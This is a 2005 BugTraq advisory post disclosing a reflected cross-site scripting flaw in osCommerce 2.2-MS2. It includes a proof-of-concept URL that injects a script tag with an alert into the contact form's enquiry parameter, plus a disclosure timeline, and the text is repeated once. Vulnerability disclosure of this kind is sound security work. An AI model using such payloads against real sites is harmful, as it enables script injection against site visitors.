BugTraq
Back to list
|
Post reply
[NOBYTES.COM: #3] osCommerce 2.2-MS2 - XSS Vulnerability
Feb 15 2005 09:59PM
John Cobb (johnc nobytes com)
Hello All,
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/tex
tare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC (at) NoBytes (dot) com [email concealed]
http://www.nobytes.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/tex
tare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC (at) NoBytes (dot) com [email concealed]
http://www.nobytes.com
[ reply ]